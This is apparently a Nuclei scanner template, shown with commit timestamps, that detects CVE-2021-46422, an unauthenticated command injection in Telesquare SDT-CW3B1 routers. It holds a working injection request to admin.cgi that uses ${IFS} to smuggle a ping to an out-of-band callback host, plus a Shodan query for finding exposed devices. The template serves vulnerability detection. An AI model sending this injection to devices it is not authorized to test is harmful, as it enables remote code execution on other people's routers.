2022-05-18 08:01:57 +00:00
id : CVE-2021-46422
info :
2022-05-18 20:58:07 +00:00
name : SDT-CW3B1 1.1.0 - OS Command Injection
2022-05-27 05:22:24 +00:00
author : badboycxcc,prajiteshsingh
2022-05-18 08:55:27 +00:00
severity : critical
description : |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
2022-05-18 08:40:28 +00:00
reference :
2022-05-18 08:01:57 +00:00
- https://www.exploit-db.com/exploits/50936
2022-05-18 20:58:07 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
2022-05-18 21:10:42 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html
2022-05-18 08:01:57 +00:00
classification :
2022-05-18 08:55:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-05-18 08:01:57 +00:00
cve-id : CVE-2021-46422
2022-05-18 08:55:27 +00:00
cwe-id : CWE-78
2023-11-05 22:23:39 +00:00
epss-score : 0.95064
epss-percentile : 0.99075
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:*
2022-05-18 08:40:28 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : telesquare
product : sdt-cs3b1_firmware
2023-09-06 12:09:01 +00:00
shodan-query : html:"SDT-CW3B1"
2023-07-12 11:56:50 +00:00
tags : packetstorm,cve,cve2021,telesquare,rce,router,injection,edb
2022-05-18 08:40:28 +00:00
variables :
2022-05-27 05:22:24 +00:00
cmd : "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
2022-05-18 08:01:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-18 08:01:57 +00:00
- method : GET
path :
2022-05-18 08:40:28 +00:00
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
2022-05-18 08:01:57 +00:00
2022-05-27 05:22:24 +00:00
matchers-condition : and
2022-05-18 08:01:57 +00:00
matchers :
2022-05-27 05:22:24 +00:00
- type : word
2022-05-18 08:01:57 +00:00
part : body
2022-05-27 05:22:24 +00:00
words :
- "<CmdResult>"
- type : word
name : http
2023-07-11 19:49:27 +00:00
part : interactsh_protocol
2022-05-27 05:22:24 +00:00
words :
- "dns"
2023-11-06 09:19:20 +00:00
# digest: 4a0a00473045022100e6c7cccec4b6b21450930c555613763ff2b1359fe0f6d587ecf058ba3ceb4194022034593a30c706d78f2f3ca7b1789d91cd305cb0dd3e601f51d03c77f15904e344:922c64590222798bb761d5b6d8e72950